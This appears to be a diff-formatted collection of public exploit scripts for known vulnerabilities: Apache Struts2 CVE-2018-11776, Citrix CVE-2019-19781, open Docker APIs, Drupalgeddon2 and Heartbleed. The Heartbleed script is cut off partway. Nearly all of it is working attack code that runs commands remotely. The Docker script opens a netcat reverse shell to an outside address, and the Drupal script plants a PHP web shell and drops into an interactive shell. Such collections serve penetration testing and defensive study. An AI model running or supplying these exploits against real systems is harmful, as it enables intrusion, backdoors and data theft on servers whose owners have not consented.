import random
|
||||
import requests
|
||||
import sys
|
||||
try:
|
||||
from urllib import parse as urlparse
|
||||
except ImportError:
|
||||
import urllib.parse
|
||||
|
||||
# Disable SSL warnings
|
||||
try:
|
||||
import requests.packages.urllib3
|
||||
requests.packages.urllib3.disable_warnings()
|
||||
except Exception:
|
||||
pass
|
||||
|
||||
if len(sys.argv) <= 1:
|
||||
print('[*] CVE: 2018-11776 - Apache Struts2 S2-057')
|
||||
print('[*] Struts-PWN - @mazen160')
|
||||
print('\n%s -h for help.' % (sys.argv[0]))
|
||||
exit(0)
|
||||
|
||||
|
||||
parser = argparse.ArgumentParser()
|
||||
parser.add_argument("-u", "--url",
|
||||
dest="url",
|
||||
help="Check a single URL.",
|
||||
action='store')
|
||||
parser.add_argument("-l", "--list",
|
||||
dest="usedlist",
|
||||
help="Check a list of URLs.",
|
||||
action='store')
|
||||
parser.add_argument("-c", "--cmd",
|
||||
dest="cmd",
|
||||
help="Command to execute. (Default: 'id')",
|
||||
action='store',
|
||||
default='id')
|
||||
parser.add_argument("--exploit",
|
||||
dest="do_exploit",
|
||||
help="Exploit.",
|
||||
action='store_true')
|
||||
|
||||
|
||||
args = parser.parse_args()
|
||||
url = args.url if args.url else None
|
||||
usedlist = args.usedlist if args.usedlist else None
|
||||
cmd = args.cmd if args.cmd else None
|
||||
do_exploit = args.do_exploit if args.do_exploit else None
|
||||
|
||||
headers = {
|
||||
'User-Agent': 'struts-pwn (https://github.com/mazen160/struts-pwn_CVE-2018-11776)',
|
||||
# 'User-Agent': 'Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36',
|
||||
'Accept': '*/*'
|
||||
}
|
||||
timeout = 3
|
||||
|
||||
|
||||
def parse_url(url):
|
||||
"""
|
||||
Parses the URL.
|
||||
"""
|
||||
|
||||
# url: http://example.com/demo/struts2-showcase/index.action
|
||||
|
||||
url = url.replace('#', '%23')
|
||||
url = url.replace(' ', '%20')
|
||||
|
||||
if ('://' not in url):
|
||||
url = str("http://") + str(url)
|
||||
scheme = urllib.parse.urlparse(url).scheme
|
||||
|
||||
# Site: http://example.com
|
||||
site = scheme + '://' + urllib.parse.urlparse(url).netloc
|
||||
|
||||
# FilePath: /demo/struts2-showcase/index.action
|
||||
file_path = urllib.parse.urlparse(url).path
|
||||
if (file_path == ''):
|
||||
file_path = '/'
|
||||
|
||||
# Filename: index.action
|
||||
try:
|
||||
filename = url.split('/')[-1]
|
||||
except IndexError:
|
||||
filename = ''
|
||||
|
||||
# File Dir: /demo/struts2-showcase/
|
||||
file_dir = file_path.rstrip(filename)
|
||||
if (file_dir == ''):
|
||||
file_dir = '/'
|
||||
|
||||
return({"site": site,
|
||||
"file_dir": file_dir,
|
||||
"filename": filename})
|
||||
|
||||
|
||||
def build_injection_inputs(url):
|
||||
"""
|
||||
Builds injection inputs for the check.
|
||||
"""
|
||||
|
||||
parsed_url = parse_url(url)
|
||||
injection_inputs = []
|
||||
url_directories = parsed_url["file_dir"].split("/")
|
||||
|
||||
try:
|
||||
url_directories.remove("")
|
||||
except ValueError:
|
||||
pass
|
||||
|
||||
for i in range(len(url_directories)):
|
||||
injection_entry = "/".join(url_directories[:i])
|
||||
|
||||
if not injection_entry.startswith("/"):
|
||||
injection_entry = "/%s" % (injection_entry)
|
||||
|
||||
if not injection_entry.endswith("/"):
|
||||
injection_entry = "%s/" % (injection_entry)
|
||||
|
||||
injection_entry += "{{INJECTION_POINT}}/" # It will be renderred later with the payload.
|
||||
injection_entry += parsed_url["filename"]
|
||||
|
||||
injection_inputs.append(injection_entry)
|
||||
|
||||
return(injection_inputs)
|
||||
|
||||
|
||||
def check(url):
|
||||
random_value = int(''.join(random.choice('0123456789') for i in range(2)))
|
||||
multiplication_value = random_value * random_value
|
||||
injection_points = build_injection_inputs(url)
|
||||
parsed_url = parse_url(url)
|
||||
print("[%] Checking for CVE-2018-11776")
|
||||
print("[*] URL: %s" % (url))
|
||||
print("[*] Total of Attempts: (%s)" % (len(injection_points)))
|
||||
attempts_counter = 0
|
||||
|
||||
for injection_point in injection_points:
|
||||
attempts_counter += 1
|
||||
print("[%s/%s]" % (attempts_counter, len(injection_points)))
|
||||
testing_url = "%s%s" % (parsed_url["site"], injection_point)
|
||||
testing_url = testing_url.replace("{{INJECTION_POINT}}", "${{%s*%s}}" % (random_value, random_value))
|
||||
try:
|
||||
resp = requests.get(testing_url, headers=headers, verify=False, timeout=timeout, allow_redirects=False)
|
||||
except Exception as e:
|
||||
print("EXCEPTION::::--> " + str(e))
|
||||
continue
|
||||
if "Location" in list(resp.headers.keys()):
|
||||
if str(multiplication_value) in resp.headers['Location']:
|
||||
print("[*] Status: Vulnerable!")
|
||||
return(injection_point)
|
||||
print("[*] Status: Not Affected.")
|
||||
return(None)
|
||||
|
||||
|
||||
def exploit(url, cmd):
|
||||
parsed_url = parse_url(url)
|
||||
|
||||
injection_point = check(url)
|
||||
if injection_point is None:
|
||||
print("[%] Target is not vulnerable.")
|
||||
return(0)
|
||||
print("[%] Exploiting...")
|
||||
|
||||
payload = """%24%7B%28%23_memberAccess%5B%22allowStaticMethodAccess%22%5D%3Dtrue%2C%23a%3D@java.lang.Runtime@getRuntime%28%29.exec%28%27{0}%27%29.getInputStream%28%29%2C%23b%3Dnew%20java.io.InputStreamReader%28%23a%29%2C%23c%3Dnew%20%20java.io.BufferedReader%28%23b%29%2C%23d%3Dnew%20char%5B51020%5D%2C%23c.read%28%23d%29%2C%23sbtest%3D@org.apache.struts2.ServletActionContext@getResponse%28%29.getWriter%28%29%2C%23sbtest.println%28%23d%29%2C%23sbtest.close%28%29%29%7D""".format(cmd)
|
||||
|
||||
testing_url = "%s%s" % (parsed_url["site"], injection_point)
|
||||
testing_url = testing_url.replace("{{INJECTION_POINT}}", payload)
|
||||
|
||||
try:
|
||||
resp = requests.get(testing_url, headers=headers, verify=False, timeout=timeout, allow_redirects=False)
|
||||
except Exception as e:
|
||||
print("EXCEPTION::::--> " + str(e))
|
||||
return(1)
|
||||
|
||||
print("[%] Response:")
|
||||
print(resp.text)
|
||||
return(0)
|
||||
|
||||
|
||||
def main(url=url, usedlist=usedlist, cmd=cmd, do_exploit=do_exploit):
|
||||
if url:
|
||||
if not do_exploit:
|
||||
check(url)
|
||||
else:
|
||||
exploit(url, cmd)
|
||||
|
||||
if usedlist:
|
||||
URLs_List = []
|
||||
try:
|
||||
f_file = open(str(usedlist), "r")
|
||||
URLs_List = f_file.read().replace("\r", "").split("\n")
|
||||
try:
|
||||
URLs_List.remove("")
|
||||
except ValueError:
|
||||
pass
|
||||
f_file.close()
|
||||
except Exception as e:
|
||||
print("Error: There was an error in reading list file.")
|
||||
print("Exception: " + str(e))
|
||||
exit(1)
|
||||
for url in URLs_List:
|
||||
if not do_exploit:
|
||||
check(url)
|
||||
else:
|
||||
exploit(url, cmd)
|
||||
|
||||
print("[%] Done.")
|
||||
|
||||
|
||||
if __name__ == "__main__":
|
||||
try:
|
||||
main(url=url, usedlist=usedlist, cmd=cmd, do_exploit=do_exploit)
|
||||
except KeyboardInterrupt:
|
||||
print("\nKeyboardInterrupt Detected.")
|
||||
print("Exiting...")
|
||||
exit(0)
|
|
@ -0,0 +1,51 @@
|
|||
#!/usr/bin/env python
|
||||
# https://github.com/mpgn/CVE-2019-19781
|
||||
# # #
|
||||
|
||||
import requests
|
||||
import string
|
||||
import random
|
||||
import re
|
||||
import sys
|
||||
from requests.packages.urllib3.exceptions import InsecureRequestWarning
|
||||
requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
|
||||
|
||||
print("CVE-2019-19781 - Remote Code Execution in Citrix Application Delivery Controller and Citrix Gateway")
|
||||
print("Found by Mikhail Klyuchnikov")
|
||||
print("")
|
||||
|
||||
if len(sys.argv) < 2:
|
||||
print("[-] No URL provided")
|
||||
sys.exit(0)
|
||||
|
||||
while True:
|
||||
try:
|
||||
command = input("command > ")
|
||||
|
||||
random_xml = ''.join(random.choices(string.ascii_uppercase + string.digits, k=12))
|
||||
print("[+] Adding bookmark", random_xml + ".xml")
|
||||
|
||||
burp0_url = sys.argv[1] + "/vpn/../vpns/portal/scripts/newbm.pl"
|
||||
burp0_headers = {"NSC_USER": "../../../../netscaler/portal/templates/" +
|
||||
random_xml, "NSC_NONCE": "c", "Connection": "close"}
|
||||
burp0_data = {"url": "http://exemple.com", "title": "[%t=template.new({'BLOCK'='print `" + str(command) + "`'})%][ % t % ]", "desc": "test", "UI_inuse": "RfWeb"}
|
||||
r = requests.post(burp0_url, headers=burp0_headers, data=burp0_data,verify=False)
|
||||
|
||||
if r.status_code == 200:
|
||||
print("[+] Bookmark added")
|
||||
else:
|
||||
print("\n[-] Target not vulnerable or something went wrong")
|
||||
sys.exit(0)
|
||||
|
||||
burp0_url = sys.argv[1] + "/vpns/portal/" + random_xml + ".xml"
|
||||
burp0_headers = {"NSC_USER": "../../../../netscaler/portal/templates/" +
|
||||
random_xml, "NSC_NONCE": "c", "Connection": "close"}
|
||||
r = requests.get(burp0_url, headers=burp0_headers,verify=False)
|
||||
|
||||
replaced = re.sub('^&#.* $', '', r.text, flags=re.MULTILINE)
|
||||
print("[+] Result of the command: \n")
|
||||
print(replaced)
|
||||
|
||||
except KeyboardInterrupt:
|
||||
print("Exiting...")
|
||||
break
|
|
@ -0,0 +1,49 @@
|
|||
from __future__ import print_function
|
||||
import requests
|
||||
import logging
|
||||
import json
|
||||
import urllib.parse
|
||||
|
||||
# NOTE
|
||||
# Enable Remote API with the following command
|
||||
# /usr/bin/dockerd -H tcp://0.0.0.0:2375 -H unix:///var/run/docker.sock
|
||||
# This is an intended feature, remember to filter the port 2375..
|
||||
|
||||
name = "docker"
|
||||
description = "Docker RCE via Open Docker API on port 2375"
|
||||
author = "Swissky"
|
||||
|
||||
# Step 1 - Extract id and name from each container
|
||||
ip = "127.0.0.1"
|
||||
port = "2375"
|
||||
data = "containers/json"
|
||||
url = "http://{}:{}/{}".format(ip, port, data)
|
||||
r = requests.get(url)
|
||||
|
||||
if r.json:
|
||||
for container in r.json():
|
||||
container_id = container['Id']
|
||||
container_name = container['Names'][0].replace('/','')
|
||||
print((container_id, container_name))
|
||||
|
||||
# Step 2 - Prepare command
|
||||
cmd = '["nc", "192.168.1.2", "4242", "-e", "/bin/sh"]'
|
||||
data = "containers/{}/exec".format(container_name)
|
||||
url = "http://{}:{}/{}".format(ip, port, data)
|
||||
post_json = '{ "AttachStdin":false,"AttachStdout":true,"AttachStderr":true, "Tty":false, "Cmd":'+cmd+' }'
|
||||
post_header = {
|
||||
"Content-Type": "application/json"
|
||||
}
|
||||
r = requests.post(url, json=json.loads(post_json))
|
||||
|
||||
|
||||
# Step 3 - Execute command
|
||||
id_cmd = r.json()['Id']
|
||||
data = "exec/{}/start".format(id_cmd)
|
||||
url = "http://{}:{}/{}".format(ip, port, data)
|
||||
post_json = '{ "Detach":false,"Tty":false}'
|
||||
post_header = {
|
||||
"Content-Type": "application/json"
|
||||
}
|
||||
r = requests.post(url, json=json.loads(post_json))
|
||||
print(r)
|
|
@ -0,0 +1,308 @@
|
|||
#!/usr/bin/env ruby
|
||||
#
|
||||
# [CVE-2018-7600] Drupal < 7.58 / < 8.3.9 / < 8.4.6 / < 8.5.1 - 'Drupalgeddon2' (SA-CORE-2018-002) ~ https://github.com/dreadlocked/Drupalgeddon2/
|
||||
#
|
||||
# Authors:
|
||||
# - Hans Topo ~ https://github.com/dreadlocked // https://twitter.com/_dreadlocked
|
||||
# - g0tmi1k ~ https://blog.g0tmi1k.com/ // https://twitter.com/g0tmi1k
|
||||
#
|
||||
|
||||
|
||||
require 'base64'
|
||||
require 'json'
|
||||
require 'net/http'
|
||||
require 'openssl'
|
||||
require 'readline'
|
||||
|
||||
|
||||
# Settings - Proxy information (nil to disable)
|
||||
proxy_addr = nil
|
||||
proxy_port = 8080
|
||||
|
||||
|
||||
# Settings - General
|
||||
$useragent = "drupalgeddon2"
|
||||
webshell = "s.php"
|
||||
writeshell = true
|
||||
|
||||
|
||||
# Settings - Payload (we could just be happy without this, but we can do better!)
|
||||
#bashcmd = "<?php if( isset( $_REQUEST[c] ) ) { eval( $_GET[c]) ); } ?>'
|
||||
bashcmd = "<?php if( isset( $_REQUEST['c'] ) ) { system( $_REQUEST['c'] . ' 2>&1' ); }"
|
||||
bashcmd = "echo " + Base64.strict_encode64(bashcmd) + " | base64 -d"
|
||||
|
||||
|
||||
# - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
|
||||
|
||||
|
||||
# Function http_post <url> [post]
|
||||
def http_post(url, payload="")
|
||||
uri = URI(url)
|
||||
request = Net::HTTP::Post.new(uri.request_uri)
|
||||
request.initialize_http_header({"User-Agent" => $useragent})
|
||||
request.body = payload
|
||||
return $http.request(request)
|
||||
end
|
||||
|
||||
|
||||
# Function gen_evil_url <cmd>
|
||||
def gen_evil_url(evil, feedback=true)
|
||||
# PHP function to use (don't forget about disabled functions...)
|
||||
phpmethod = $drupalverion.start_with?('8')? "exec" : "passthru"
|
||||
|
||||
#puts "[*] PHP cmd: #{phpmethod}" if feedback
|
||||
puts "[*] Payload: #{evil}" if feedback
|
||||
|
||||
## Check the version to match the payload
|
||||
# Vulnerable Parameters: #access_callback / #lazy_builder / #pre_render / #post_render
|
||||
if $drupalverion.start_with?('8')
|
||||
# Method #1 - Drupal 8, mail, #post_render - response is 200
|
||||
url = $target + "user/register?element_parents=account/mail/%23value&ajax_form=1&_wrapper_format=drupal_ajax"
|
||||
payload = "form_id=user_register_form&_drupal_ajax=1&mail[a][#post_render][]=" + phpmethod + "&mail[a][#type]=markup&mail[a][#markup]=" + evil
|
||||
|
||||
# Method #2 - Drupal 8, timezone, #lazy_builder - response is 500 & blind (will need to disable target check for this to work!)
|
||||
#url = $target + "user/register%3Felement_parents=timezone/timezone/%23value&ajax_form=1&_wrapper_format=drupal_ajax"
|
||||
#payload = "form_id=user_register_form&_drupal_ajax=1&timezone[a][#lazy_builder][]=exec&timezone[a][#lazy_builder][][]=" + evil
|
||||
elsif $drupalverion.start_with?('7')
|
||||
# Method #3 - Drupal 7, name, #post_render - response is 200
|
||||
url = $target + "?q=user/password&name[%23post_render][]=" + phpmethod + "&name[%23type]=markup&name[%23markup]=" + evil
|
||||
payload = "form_id=user_pass&_triggering_element_name=name"
|
||||
else
|
||||
puts "[!] Unsupported Drupal version"
|
||||
exit
|
||||
end
|
||||
|
||||
# Drupal v7 needs an extra value from a form
|
||||
if $drupalverion.start_with?('7')
|
||||
response = http_post(url, payload)
|
||||
|
||||
form_build_id = response.body.match(/input type="hidden" name="form_build_id" value="(.*)"/).to_s().slice(/value="(.*)"/, 1).to_s.strip
|
||||
puts "[!] WARNING: Didn't detect form_build_id" if form_build_id.empty?
|
||||
|
||||
#url = $target + "file/ajax/name/%23value/" + form_build_id
|
||||
url = $target + "?q=file/ajax/name/%23value/" + form_build_id
|
||||
payload = "form_build_id=" + form_build_id
|
||||
end
|
||||
|
||||
return url, payload
|
||||
end
|
||||
|
||||
|
||||
# - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
|
||||
|
||||
|
||||
# Quick how to use
|
||||
if ARGV.empty?
|
||||
puts "Usage: ruby drupalggedon2.rb <target>"
|
||||
puts " ruby drupalgeddon2.rb https://example.com"
|
||||
exit
|
||||
end
|
||||
# Read in values
|
||||
$target = ARGV[0]
|
||||
|
||||
|
||||
# Check input for protocol
|
||||
if not $target.start_with?('http')
|
||||
$target = "http://#{$target}"
|
||||
end
|
||||
# Check input for the end
|
||||
if not $target.end_with?('/')
|
||||
$target += "/"
|
||||
end
|
||||
|
||||
|
||||
# - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
|
||||
|
||||
|
||||
# Banner
|
||||
puts "[*] --==[::#Drupalggedon2::]==--"
|
||||
puts "-"*80
|
||||
puts "[*] Target : #{$target}"
|
||||
puts "[*] Write? : Skipping writing web shell" if not writeshell
|
||||
puts "-"*80
|
||||
|
||||
|
||||
# - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
|
||||
|
||||
|
||||
# Setup connection
|
||||
uri = URI($target)
|
||||
$http = Net::HTTP.new(uri.host, uri.port, proxy_addr, proxy_port)
|
||||
|
||||
|
||||
# Use SSL/TLS if needed
|
||||
if uri.scheme == "https"
|
||||
$http.use_ssl = true
|
||||
$http.verify_mode = OpenSSL::SSL::VERIFY_NONE
|
||||
end
|
||||
|
||||
|
||||
# - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
|
||||
|
||||
|
||||
# Try and get version
|
||||
$drupalverion = nil
|
||||
# Possible URLs
|
||||
url = [
|
||||
$target + "CHANGELOG.txt",
|
||||
$target + "core/CHANGELOG.txt",
|
||||
$target + "includes/bootstrap.inc",
|
||||
$target + "core/includes/bootstrap.inc",
|
||||
]
|
||||
# Check all
|
||||
url.each do|uri|
|
||||
# Check response
|
||||
response = http_post(uri)
|
||||
|
||||
if response.code == "200"
|
||||
puts "[+] Found : #{uri} (#{response.code})"
|
||||
|
||||
# Patched already?
|
||||
puts "[!] WARNING: Might be patched! Found SA-CORE-2018-002: #{url}" if response.body.include? "SA-CORE-2018-002"
|
||||
|
||||
# Try and get version from the file contents
|
||||
$drupalverion = response.body.match(/Drupal (.*),/).to_s.slice(/Drupal (.*),/, 1).to_s.strip
|
||||
|
||||
# If not, try and get it from the URL
|
||||
$drupalverion = uri.match(/core/)? "8.x" : "7.x" if $drupalverion.empty?
|
||||
|
||||
# Done!
|
||||
break
|
||||
elsif response.code == "403"
|
||||
puts "[+] Found : #{uri} (#{response.code})"
|
||||
|
||||
# Get version from URL
|
||||
$drupalverion = uri.match(/core/)? "8.x" : "7.x"
|
||||
else
|
||||
puts "[!] MISSING: #{uri} (#{response.code})"
|
||||
end
|
||||
end
|
||||
|
||||
|
||||
# Feedback
|
||||
if $drupalverion
|
||||
status = $drupalverion.end_with?('x')? "?" : "!"
|
||||
puts "[+] Drupal#{status}: #{$drupalverion}"
|
||||
else
|
||||
puts "[!] Didn't detect Drupal version"
|
||||
puts "[!] Forcing Drupal v8.x attack"
|
||||
$drupalverion = "8.x"
|
||||
end
|
||||
puts "-"*80
|
||||
|
||||
|
||||
|
||||
# - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
|
||||
|
||||
|
||||
|
||||
# Make a request, testing code execution
|
||||
puts "[*] Testing: Code Execution"
|
||||
# Generate a random string to see if we can echo it
|
||||
random = (0...8).map { (65 + rand(26)).chr }.join
|
||||
url, payload = gen_evil_url("echo #{random}")
|
||||
response = http_post(url, payload)
|
||||
if response.code == "200" and not response.body.empty?
|
||||
#result = JSON.pretty_generate(JSON[response.body])
|
||||
result = $drupalverion.start_with?('8')? JSON.parse(response.body)[0]["data"] : response.body
|
||||
puts "[+] Result : #{result}"
|
||||
|
||||
puts response.body.match(/#{random}/)? "[+] Good News Everyone! Target seems to be exploitable (Code execution)! w00hooOO!" : "[+] Target might to be exploitable?"
|
||||
else
|
||||
puts "[!] Target is NOT exploitable ~ HTTP Response: #{response.code}"
|
||||
exit
|
||||
end
|
||||
puts "-"*80
|
||||
|
||||
|
||||
# Location of web shell & used to signal if using PHP shell
|
||||
webshellpath = nil
|
||||
prompt = "drupalgeddon2"
|
||||
# Possibles paths to try
|
||||
paths = [
|
||||
"./",
|
||||
"./sites/default/",
|
||||
"./sites/default/files/",
|
||||
]
|
||||
# Check all
|
||||
paths.each do|path|
|
||||
puts "[*] Testing: File Write To Web Root (#{path})"
|
||||
|
||||
# Merge locations
|
||||
webshellpath = "#{path}#{webshell}"
|
||||
|
||||
# Final command to execute
|
||||
cmd = "#{bashcmd} | tee #{webshellpath}"
|
||||
|
||||
# Generate evil URLs
|
||||
url, payload = gen_evil_url(cmd)
|
||||
# Make the request
|
||||
response = http_post(url, payload)
|
||||
# Check result
|
||||
if response.code == "200" and not response.body.empty?
|
||||
# Feedback
|
||||
#result = JSON.pretty_generate(JSON[response.body])
|
||||
result = $drupalverion.start_with?('8')? JSON.parse(response.body)[0]["data"] : response.body
|
||||
puts "[+] Result : #{result}"
|
||||
|
||||
# Test to see if backdoor is there (if we managed to write it)
|
||||
response = http_post("#{$target}#{webshellpath}", "c=hostname")
|
||||
if response.code == "200" and not response.body.empty?
|
||||
puts "[+] Very Good News Everyone! Wrote to the web root! Waayheeeey!!!"
|
||||
break
|
||||
else
|
||||
puts "[!] Target is NOT exploitable. No write access here!"
|
||||
end
|
||||
else
|
||||
puts "[!] Target is NOT exploitable for some reason ~ HTTP Response: #{response.code}"
|
||||
end
|
||||
webshellpath = nil
|
||||
end if writeshell
|
||||
puts "-"*80 if writeshell
|
||||
|
||||
if webshellpath
|
||||
# Get hostname for the prompt
|
||||
prompt = response.body.to_s.strip
|
||||
|
||||
# Feedback
|
||||
puts "[*] Fake shell: curl '#{$target}#{webshell}' -d 'c=whoami'"
|
||||
elsif writeshell
|
||||
puts "[!] FAILED: Coudn't find writeable web path"
|
||||
puts "[*] Dropping back direct commands (expect an ugly shell!)"
|
||||
end
|
||||
|
||||
|
||||
# Stop any CTRL + C action ;)
|
||||
trap("INT", "SIG_IGN")
|
||||
|
||||
|
||||
# Forever loop
|
||||
loop do
|
||||
# Default value
|
||||
result = "ERROR"
|
||||
|
||||
# Get input
|
||||
command = Readline.readline("#{prompt}>> ", true).to_s
|
||||
|
||||
# Exit
|
||||
break if command =~ /exit/
|
||||
|
||||
# Blank link?
|
||||
next if command.empty?
|
||||
|
||||
# If PHP shell
|
||||
if webshellpath
|
||||
# Send request
|
||||
result = http_post("#{$target}#{webshell}", "c=#{command}").body
|
||||
# Direct commands
|
||||
else
|
||||
url, payload = gen_evil_url(command, false)
|
||||
response = http_post(url, payload)
|
||||
if response.code == "200" and not response.body.empty?
|
||||
result = $drupalverion.start_with?('8')? JSON.parse(response.body)[0]["data"] : response.body
|
||||
end
|
||||
end
|
||||
|
||||
# Feedback
|
||||
puts result
|
||||
end
|
|
@ -0,0 +1,216 @@
|
|||
#!/usr/bin/python
|
||||
|
||||
# Quick and dirty demonstration of CVE-2014-0160 originally by Jared Stafford (jspenguin@jspenguin.org)
|
||||
# The author disclaims copyright to this source code.
|
||||
# Modified by SensePost based on lots of other people's efforts (hard to work out credit via PasteBin)
|
||||
|
||||
from __future__ import print_function
|
||||
from builtins import str
|
||||
from builtins import range
|
||||
import sys
|
||||
import struct
|
||||
import socket
|
||||
import time
|
||||
import select
|
||||
import re
|
||||
from optparse import OptionParser
|
||||
import smtplib
|
||||
|
||||
options = OptionParser(usage='%prog server [options]', description='Test for SSL heartbeat vulnerability (CVE-2014-0160)')
|
||||
options.add_option('-p', '--port', type='int', default=443, help='TCP port to test (default: 443)')
|
||||
options.add_option('-n', '--num', type='int', default=1, help='Number of heartbeats to send if vulnerable (defines how much memory you get back) (default: 1)')
|
||||
options.add_option('-f', '--file', type='str', default='dump.bin', help='Filename to write dumped memory too (default: dump.bin)')
|
||||
options.add_option('-q', '--quiet', default=False, help='Do not display the memory dump', action='store_true')
|
||||
options.add_option('-s', '--starttls', action='store_true', default=False, help='Check STARTTLS (smtp only right now)')
|
||||
|
||||
def h2bin(x):
|
||||
return x.replace(' ', '').replace('\n', '').decode('hex')
|
||||
|
||||
hello = h2bin('''
|
||||
16 03 02 00 dc 01 00 00 d8 03 02 53
|
||||
43 5b 90 9d 9b 72 0b bc 0c bc 2b 92 a8 48 97 cf
|
||||
bd 39 04 cc 16 0a 85 03 90 9f 77 04 33 d4 de 00
|
||||
00 66 c0 14 c0 0a c0 22 c0 21 00 39 00 38 00 88
|
||||
00 87 c0 0f c0 05 00 35 00 84 c0 12 c0 08 c0 1c
|
||||
c0 1b 00 16 00 13 c0 0d c0 03 00 0a c0 13 c0 09
|
||||
c0 1f c0 1e 00 33 00 32 00 9a 00 99 00 45 00 44
|
||||
c0 0e c0 04 00 2f 00 96 00 41 c0 11 c0 07 c0 0c
|
||||
c0 02 00 05 00 04 00 15 00 12 00 09 00 14 00 11
|
||||
00 08 00 06 00 03 00 ff 01 00 00 49 00 0b 00 04
|
||||
03 00 01 02 00 0a 00 34 00 32 00 0e 00 0d 00 19
|
||||
00 0b 00 0c 00 18 00 09 00 0a 00 16 00 17 00 08
|
||||
00 06 00 07 00 14 00 15 00 04 00 05 00 12 00 13
|
||||
00 01 00 02 00 03 00 0f 00 10 00 11 00 23 00 00
|
||||
00 0f 00 01 01
|
||||
''')
|
||||
|
||||
hbv10 = h2bin('''
|
||||
18 03 01 00 03
|
||||
01 40 00
|
||||
''')
|
||||
|
||||
hbv11 = h2bin('''
|
||||
18 03 02 00 03
|
||||
01 40 00
|
||||
''')
|
||||
|
||||
hbv12 = h2bin('''
|
||||
18 03 03 00 03
|
||||
01 40 00
|
||||
''')
|
||||
|
||||
def hexdump(s, dumpf, quiet):
|
||||
dump = open(dumpf,'a')
|
||||
dump.write(s)
|
||||
dump.close()
|
||||
if quiet: return
|
||||
for b in range(0, len(s), 16):
|
||||
lin = [c for c in s[b : b + 16]]
|
||||
hxdat = ' '.join('%02X' % ord(c) for c in lin)
|
||||
pdat = ''.join((c if 32 <= ord(c) <= 126 else '.' )for c in lin)
|
||||
print(' %04x: %-48s %s' % (b, hxdat, pdat))
|
||||
print()
|
||||
|
||||
def recvall(s, length, timeout=5):
|
||||
endtime = time.time() + timeout
|
||||
rdata = ''
|
||||
remain = length
|
||||
while remain > 0:
|
||||
rtime = endtime - time.time()
|
||||
if rtime < 0:
|
||||
if not rdata:
|
||||
return None
|
||||
else:
|
||||
return rdata
|
||||
r, w, e = select.select([s], [], [], 5)
|
||||
if s in r:
|
||||
data = s.recv(remain)
|
||||
# EOF?
|
||||
if not data:
|
||||
return None
|
||||
rdata += data
|
||||
remain -= len(data)
|
||||
return rdata
|
||||
|
||||
def recvmsg(s):
|
||||
hdr = recvall(s, 5)
|
||||
if hdr is None:
|
||||
print('Unexpected EOF receiving record header - server closed connection')
|
||||
return None, None, None
|
||||
typ, ver, ln = struct.unpack('>BHH', hdr)
|
||||
pay = recvall(s, ln, 10)
|
||||
if pay is None:
|
||||
print('Unexpected EOF receiving record payload - server closed connection')
|
||||
return None, None, None
|
||||
print(' ... received message: type = %d, ver = %04x, length = %d' % (typ, ver, len(pay)))
|
||||
return typ, ver, pay
|
||||
|
||||
def hit_hb(s, dumpf, host, quiet):
|
||||
while True:
|
||||
typ, ver, pay = recvmsg(s)
|
||||
if typ is None:
|
||||
print('No heartbeat response received from '+host+', server likely not vulnerable')
|
||||
return False
|
||||
|
||||
if typ == 24:
|
||||
if not quiet: print('Received heartbeat response:')
|
||||
hexdump(pay, dumpf, quiet)
|
||||
if len(pay) > 3:
|
||||
print('WARNING: server '+ host +' returned more data than it should - server is vulnerable!')
|
||||
else:
|
||||
print('Server '+host+' processed malformed heartbeat, but did not return any extra data.')
|
||||
return True
|
||||
|
||||
if typ == 21:
|
||||
if not quiet: print('Received alert:')
|
||||
hexdump(pay, dumpf, quiet)
|
||||
print('Server '+ host +' returned error, likely not vulnerable')
|
||||
return False
|
||||
|
||||
def connect(host, port, quiet):
|
||||
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
|
||||
if not quiet: print('Connecting...')
|
||||
sys.stdout.flush()
|
||||
s.connect((host, port))
|
||||
return s
|
||||
|
||||
def tls(s, quiet):
|
||||
if not quiet: print('Sending Client Hello...')
|
||||
sys.stdout.flush()
|
||||
s.send(hello)
|
||||
if not quiet: print('Waiting for Server Hello...')
|
||||
sys.stdout.flush()
|
||||
|
||||
def parseresp(s):
|
||||
while True:
|
||||
typ, ver, pay = recvmsg(s)
|
||||
if typ == None:
|
||||
print('Server closed connection without sending Server Hello.')
|
||||
return 0
|
||||
# Look for server hello done message.
|
||||
if typ == 22 and ord(pay[0]) == 0x0E:
|
||||
return ver
|
||||
|
||||
def check(host, port, dumpf, quiet, starttls):
|
||||
response = False
|
||||
if starttls:
|
||||
try:
|
||||
s = smtplib.SMTP(host=host,port=port)
|
||||
s.ehlo()
|
||||
s.starttls()
|
||||
except smtplib.SMTPException:
|
||||
print('STARTTLS not supported...')
|
||||
s.quit()
|
||||
return False
|
||||
print('STARTTLS supported...')
|
||||
s.quit()
|
||||
s = connect(host, port, quiet)
|
||||
s.settimeout(1)
|
||||
try:
|
||||
re = s.recv(1024)
|
||||
s.send('ehlo starttlstest\r\n')
|
||||
re = s.recv(1024)
|
||||
s.send('starttls\r\n')
|
||||
re = s.recv(1024)
|
||||
except socket.timeout:
|
||||
print('Timeout issues, going ahead anyway, but it is probably broken ...')
|
||||
tls(s,quiet)
|
||||
else:
|
||||
s = connect(host, port, quiet)
|
||||
tls(s,quiet)
|
||||
|
||||
version = parseresp(s)
|
||||
|
||||
if version == 0:
|
||||
if not quiet: print("Got an error while parsing the response, bailing ...")
|
||||
return False
|
||||
else:
|
||||
version = version - 0x0300
|
||||
if not quiet: print("Server TLS version was 1.%d\n" % version)
|
||||
|
||||
if not quiet: print('Sending heartbeat request...')
|
||||
sys.stdout.flush()
|
||||
if (version == 1):
|
||||
s.send(hbv10)
|
||||
response = hit_hb(s,dumpf, host, quiet)
|
||||
if (version == 2):
|
||||
s.send(hbv11)
|
||||
response = hit_hb(s,dumpf, host, quiet)
|
||||
if (version == 3):
|
||||
s.send(hbv12)
|
||||
response = hit_hb(s,dumpf, host, quiet)
|
||||
s.close()
|
||||
return response
|
||||
|
||||
def main():
|
||||
opts, args = options.parse_args()
|
||||
if len(args) < 1:
|
||||
options.print_help()
|
||||
return
|
||||
|
||||
print('Scanning ' + args[0] + ' on port ' + str(opts.port))
|
||||
